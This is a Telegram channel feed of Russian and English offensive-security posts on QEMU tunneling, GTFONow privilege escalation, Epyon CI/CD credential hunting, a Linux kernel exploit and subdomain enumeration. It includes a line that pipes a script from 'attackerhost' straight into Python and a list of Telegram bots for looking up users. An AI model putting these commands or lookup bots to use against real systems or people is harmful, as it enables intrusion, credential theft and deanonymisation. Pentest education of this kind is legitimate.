Pentester's Backlog
589 subscribers
309 photos
15 videos
44 files
424 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
Channel name was changed to «Pentester's Backlog»
🔠🔠🔠 Сравнение наиболее часто используемых в наше время протоколов VPN
Please open Telegram to view this post
VIEW IN TELEGRAM
2
Forwarded from PT SWARM
🎁 Source Code Disclosure in IIS 10.0! Almost.

There is a method to reveal the source code of some .NET apps. Here's how it works.

👉 https://swarm.ptsecurity.com/source-code-disclosure-in-asp-net-apps/
1🔥1
Cheat Sheet для ChatGPT
3
Forwarded from PurpleBear (Vadim Shelest)
Network tunneling with… QEMU?

Существует множество техник и инструментов для проксирования и создания туннелей в рамках Pivoting, которые позволяют атакующему получить доступ к локальным ресурсам, по сути, делая маршрутизируемым тот трафик, который в нормальных условиях не является маршрутизируемым😎 Но часто бывает, что нет возможности тащить что-то на отломанный хост, или архитектура процессора, ОС или ограниченные ресурсы этого просто не позволяют (например, в случаях с IoT девайсами🙈) Или вам просто очень нравится концепция LOTL и вы не боитесь экспериментов🔬

В блоге Securelist by Kaspersky опубликованы подробности техники использования киберзлодеями - QEMU в качестве инструмента для туннелирования. Для справки QEMU - это эмулятор аппаратного обеспечения различных платформ, позволяющий запускать различные гостевые операционные системы, другими словами это платформа программной виртуализации.

Суть техники заключается в создании network backend -netdev user, socket, hubport интерфейсов для создания туннелей к другим QEMU-виртуалкам внутри и за пределами сети с использованием network stack хоста

qemu-system-i386.exe -m 1M -netdev user,id=lan,restrict=off -netdev
socket,id=sock,connect=<IP>:443 -netdev hubport,id=port-lan,hubid=0,netdev=lan -netdev
hubport,id=port-sock,hubid=0,netdev=sock -nographic


Другими словами подобная схема позволяет использовать созданные интерфейсы QEMU для классического туннелирования трафика, к тому же согласно документации QEMU поддерживает TAP, а значит по идее позволяет проводит L2 атаки😎

🖇 References:
☑️ Network Pivoting Techniques
☑️ Сергей Зыбнев: туннельное мышление, или Разбираемся с pivoting
☑️ Caster - MikroTik Nightmare

#pivoting #QEMU
👨‍💻1
😁4
Forwarded from Kali Linux
This media is not supported in your browser
VIEW IN TELEGRAM
💻 В этом посте поговорим об инструменте `GTFONow`

Данный инструмент предназначен для автоматической эскалации привилегий в Unix‑подобных системах через команду sudo, также через атрибут SUID бинарных файлов в системе с использованием базы GTFOBins.

Основные особенности:
🗄Автоматическая эксплуатация неправильно настроенных разрешений sudo.
🗄Автоматическая эксплуатация неправильно настроенных разрешений suid, sgid.
🗄Автоматическая эксплуатация неправильных настроенных компонентов ОС.
🗄Автоматическая эксплуатация через SSH‑ключи.
🗄Автоматическая эксплуатация через файл используемый в cron.
🗄Автоматическая эксплуатация через переменную окружения LD_PRELOAD.
🗄Легкий запуск без файлов с помощью curl http://attackerhost/gtfonow.py | python

🖥 GTFONow

@linuxkalii
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
🔺 Ускоряем пентест CI/CD
Пост должен был выйти чуть позже, но увидев, что скоро начнется соревнование для попадания на Standoff 13 👨‍💻 я решил выпустить его чуть раньше. Он может вам пригодиться, особенно, если оценивать прошлый год.

В последние годы пентестеры все больше обращают внимание на присутствие платформ DevOps, а уже и DevSecOps. Эти экосистемы состоят из различных сервисов, используемых в конвейерах CI/CD, включая:

🔵 Репозитории исходного кода (Gitlab, Gitea)

🔵 Реестры контейнеров (Docker Registry, Sonatype Nexus, JFrog)

🔵 Серверы автоматизации (Gitlab-CI, Jenkins)

🔵 Инструменты для обеспечения качества и безопасности кода (много об этом говорили).

Перспективы копать именно под CI/CD: Возможности и проблемы

Для злоумышленников и пентестеров экосистема CI/CD представляет собой "обоюдоострый меч" — богатство информации и потенциальные точки входа. Слияние множества сервисов, от репозиториев до серверов автоматизации, хранит в себе кучу данных, включая исходный код, образы контейнеров и различные учетные данные 🌐. Такая среда облегчает горизонтальное перемещение, а скомпрометированные API-токены открывают путь для дальнейшей эксплуатации.

Мой личный опыт работы показывает, что компрометация облачных сервисов через CI/CD — это быстрый путь к эскалации. (привет уязвимостям в GitLab 🤗)

📕

Пример таких уязвимостей:

CVE-2022-2185 — ТЫК
CVE-2021-22205 — ТЫК
CVE-2023-5009 — ТЫК
CVE-2023-7028 — ТЫК
CVE-2024-0402 — ТЫК


Но тут возникают сложности... множество целей в экосистеме CI/CD, зависимость от официальных API для атак и огромный объем данных требуют стратегического и автоматизированного подхода.

😜 Виновник поста или швейцарский нож для тестирования на проникновение в CI/CD

💻 Сразу ссылка на инструмент — ТЫК

Epyon был представлен в 2022 году как универсальный инструмент для работы пентестеров в экосистемах CI/CD. Разработанный на языке 💻, включает в себя ряд модулей, предназначенных для взаимодействия с распространенными системами DevOps, и легко интегрируется с такими инструментами, как Gitleaks и TruffleHog, для улучшения разведки и эксплуатации (именно этим мне он и понравился).

Модули Epyon охватывают широкий спектр, включая:

1. Gitlab
2. Github
3. Jenkins
4. Azure DevOps
5. Sonatype Nexus
6. Docker Registry
7. Sonarqube
8. Gitea
9. Artifactory
10. Terraform Cloud/Enterprise

✏️ Перейдем к тестам

Я протестировал его в своей домашней лаборатории, изучив модули Gitlab(community), Jenkins, Nexus(community) и Docker Registry (про него и поговорим).

Изначально хотел проверить на Gitlab, но столкнулся с проблемой. У меня слишком много проектов, которые пришлось бы скрывать, чтобы не показывать спойлеры для будущих проектов и стратап-идей.


Пример: HTTP API Docker Registry.

Команда epyon registry может быть использована для взаимодействия с реестром Docker:

Epyon позволяет пользователям легко взаимодействовать с API реестра и получать информацию о нескольких образах контейнеров. Следующий список показывает шаги, которые были выполнены в этом примере:

Шаг 01: Получить список образов

Опция list-images может быть использована для перечисления всех образов контейнеров.

Шаг 02: Получить теги для каждого образа

Опция list-tags получит все доступные теги для каждого образа.

Шаг 03: Скачать образы контейнеров

Опция download-images загрузит и извлечет содержимое образа (загруженные файлы будут помещены в каталог, указанный в файле config.yaml).

Шаг 04: Поиск учетных данных

Недавно в каком-то из чатов спрашивали про поиск учеток в докере. Так вот, как там и ответил, я буду использовать Trufflehog.

🥂 Profit

Вот нами уже и найдены login/pass, api key и много других критически важных артефактов

🛡 Заключение

В нашем деле важно уметь сокращать время, затрачиваемое на выполнение рутинных задач. И данный инструмент с этим справляется как нельзя кстати. Из минусов хочу отметить отсутствие тонкой настройки работы через конфиг, хотя сделать это через библиотеку go viper достаточно просто.

#redteam
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from GreyTeam | Хакеры
«За долгое время работы насобирали много шишек, как своих, так и чужих, подслушанных в кулуарах (эти истории включены с одобрения владельцев). С радостью дадим вам вредных советов, чтобы вы могли набить такие же. Хорошим пентестерам к прочтению запрещено!»

#pentest
#osint

https://telegra.ph/Kak-zaporot-fishing-sovety-pentesteram-03-21
Forwarded from 1N73LL1G3NC3
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-1086 Linux kernel LPE

Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.

A full write-up of the exploit - including background information and loads of useful diagrams - can be found in the Flipping Pages blogpost.
🔥1
Kerberos простыми словами

Прекрасный лонгрид от Юрия Строжевского про механизм работы протокола Kerberos, его технические ньюансы, а также о способе его тестирования.

👁 Читать
Мы совместно с 🐈‍⬛ @CentralWeb057 🐈‍⬛ замутили совместную подборку БАЗОВЫХ телеграм ботов для осинта по по тг пользователем (ссылки актуальные)

DISCLAIMER: Не использовать информацию в целях докса или деанона

@xtl2yokcskss_bot - дефолт глаз бога 👀

@AngelSystemRobot - дефолт архангел 🪽

@search_is_himera_bot - дефолт химера 👹

@UniversalSearchTopBot - неплохая альтернатива предыдущим трем

@unamer_bot - история юзернеймов / @SangMata_BOT - бесплатный аналог

@ibhld_bot - интересы
@telesint_bot - чаты
@funstatbot - стата по активности в чатах

☺️ удачных вам расследований ребята, а серия постов по осинту будет продолжаться ☺️
Please open Telegram to view this post
VIEW IN TELEGRAM
😈2🥴1
Forwarded from Cult Of Wire
subfinder и sublist3r инструменты хорошие и быстрые, но могут давать немного разный результат. А так как вывод в одном формате, мы можем собрать всё в один список.

Ищем возможные поддомены:
subfinder -d domain.com -nc -o domain_subfinder.txt      
sublist3r -n -d domain.com -o domain_sublist3r.txt

Собираем в один файл:
cat domain_subfinder.txt domain_sublis3r.txt | sort | uniq > domain_uniq.txt

А дальше уже на своё усмотрение. Можно поискать веб:
eyewitness -f domain_uniq.txt.txt --web
httpx -l domain_uniq.txt -sc

Или просто передать в nuclei или nmap.
Forwarded from Offensive Xwitter
😈 [ Kali Linux @kalilinux ]

The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.

🐥 [ tweet ]

⚠️ UPDATE ASAP ⚠️